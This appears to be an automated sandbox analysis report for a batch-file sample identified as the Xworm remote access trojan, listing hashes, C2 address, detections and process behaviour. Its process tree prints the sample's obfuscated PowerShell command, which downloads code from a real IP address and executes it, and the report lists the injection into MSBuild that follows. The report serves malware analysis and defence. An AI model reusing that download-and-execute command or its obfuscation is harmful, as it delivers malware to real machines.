Analysis
-
max time kernel
94s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20250217-en -
resource tags
arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system -
submitted
04/03/2025, 13:56
Static task
static1
Behavioral task
behavioral1
Sample
cmd.bat
Resource
win7-20241010-en
General
-
Target
cmd.bat
-
Size
180B
-
MD5
b3cede4b5d517877a96f997ef702fb47
-
SHA1
a4aa92e6231e8ac310b32ecfd6d8f82f3b1c76af
-
SHA256
450f94a61505838c596764d3e70dce13638ae0086e5695b09264258a859dc42f
-
SHA512
5d7e73be8121dd8d3374d773d83f1fc553e748ef863a7fc7d914eecae8d1086dcb17dfc14a36ffd00456802af1f708ea19e8c8887203137c6ecf77c7f1239080
Malware Config
Extracted
http://92.255.57.221/a.mp4
Extracted
xworm
5.0
92.255.57.221:4414
Signatures
-
Detect Xworm Payload 3 IoCs
resource yara_rule behavioral2/files/0x000d000000023c00-25.dat family_xworm behavioral2/memory/2620-26-0x00000253550F0000-0x0000025355100000-memory.dmp family_xworm behavioral2/memory/4816-28-0x0000000000400000-0x000000000040E000-memory.dmp family_xworm -
Xworm family
-
Blocklisted process makes network request 1 IoCs
flow pid Process 6 2620 powershell.exe -
pid Process 2620 powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2620 set thread context of 4816 2620 powershell.exe 95 -
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 2620 powershell.exe 2620 powershell.exe 2620 powershell.exe 2620 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2620 powershell.exe Token: SeDebugPrivilege 4816 MSBuild.exe -
Suspicious use of WriteProcessMemory 17 IoCs
description pid Process procid_target PID 4132 wrote to memory of 2620 4132 cmd.exe 86 PID 4132 wrote to memory of 2620 4132 cmd.exe 86 PID 2620 wrote to memory of 2996 2620 powershell.exe 92 PID 2620 wrote to memory of 2996 2620 powershell.exe 92 PID 2996 wrote to memory of 2080 2996 csc.exe 93 PID 2996 wrote to memory of 2080 2996 csc.exe 93 PID 2620 wrote to memory of 860 2620 powershell.exe 94 PID 2620 wrote to memory of 860 2620 powershell.exe 94 PID 2620 wrote to memory of 860 2620 powershell.exe 94 PID 2620 wrote to memory of 4816 2620 powershell.exe 95 PID 2620 wrote to memory of 4816 2620 powershell.exe 95 PID 2620 wrote to memory of 4816 2620 powershell.exe 95 PID 2620 wrote to memory of 4816 2620 powershell.exe 95 PID 2620 wrote to memory of 4816 2620 powershell.exe 95 PID 2620 wrote to memory of 4816 2620 powershell.exe 95 PID 2620 wrote to memory of 4816 2620 powershell.exe 95 PID 2620 wrote to memory of 4816 2620 powershell.exe 95
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\cmd.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:4132 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$FC1='ject Net.WebCli';$FC2='loadString(''http://92.255.57.221/a.mp4'')';$FC3='ent).Down';$FC4='(New-Ob';$E5=IEX ($FC4,$FC1,$FC3,$FC2 -Join '')|IEX"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2620 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ejxaqe2r\ejxaqe2r.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:2996 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC4A8.tmp" "c:\Users\Admin\AppData\Local\Temp\ejxaqe2r\CSC7B59A7462F9148B7AFEE9AD0857BA79E.TMP"4⤵PID:2080
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"3⤵PID:860
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4816
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5087b6a34d3d7b584d66191e0b28052d1
SHA1f7ea5b0da7a913cface870752abbadd9779eea24
SHA256a498c0a7fe23b36b3d3f246808010064d08bf324caa12fb3b77e2a11ae93a808
SHA512e3306b4e216a0aaf9485ac7c25179afacd0254e76febc291d43a26b23fedf46aaaafb542361314bdea007d35a8d25a07d4e787e5fd280407a7ce7d7e0f6cc69f
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
42KB
MD5ca3b0aa79dc903560f413ecee244854d
SHA107d2cd95afa546bda0690ed29a4c333219498734
SHA256dac45082626c0dff567f69e85072a9334370e7028f739c6dab9fe3baeb7640c6
SHA512d57424e645fad526042026c777c5e7aae15663b212e15b3dd953639b380bafe709c09d14755d5e005994e3d85a3be26a0e536adb3ff484ed1b9f1cf01b81c358
-
Filesize
652B
MD590f97882f62fb0aa3ade3170f2e0288e
SHA1c8ebea1f684fe15c49f75878fe18838428edcb90
SHA25649bbc195da48f064cbe110e9be484211f1b55df3afaf97d940f6b4cd40161e21
SHA512bdf77c10304bac1f73eee5fc9036b5c0a5c02423df9418423b1693ca5cd2cd4c223a3113e48f4910775e3541abaffaa834b36b7e29c74c09ca701ab1dbdd8865
-
Filesize
103KB
MD5992ab26a03ded91714491d267da55fb2
SHA125fe04d5493f7e904bd4e64078aa464226e8f393
SHA2563b18772dbf088171f78cccd3da6fb05f46918b2bafa17ab43ea03ec0507935c1
SHA512a1dbfd27e02d10e978475bf9c1279c489e1c9febd8456492e2b0d7df33563c4e81cc28e39f6a90aa82cadc06927bce2f831f2089b5e57da4ea89862a6d82ad0f
-
Filesize
204B
MD52a0085c1b3e6523014f1400f57ab7098
SHA168eecca2f7ca19027f26d2e1a1169e7cc9314a89
SHA256e1a2347d80afd8ca8ea42ea1e4316dea04eb9e9d878ee9e49773fb4ff1842687
SHA512fc3329ea8ed3c2238233653d18301689fa38962f40be73a472700b4c546f4d70cd8ff34d0f8e09f07539330f18086202af3c3cb115fd72912f5a14fff90013dd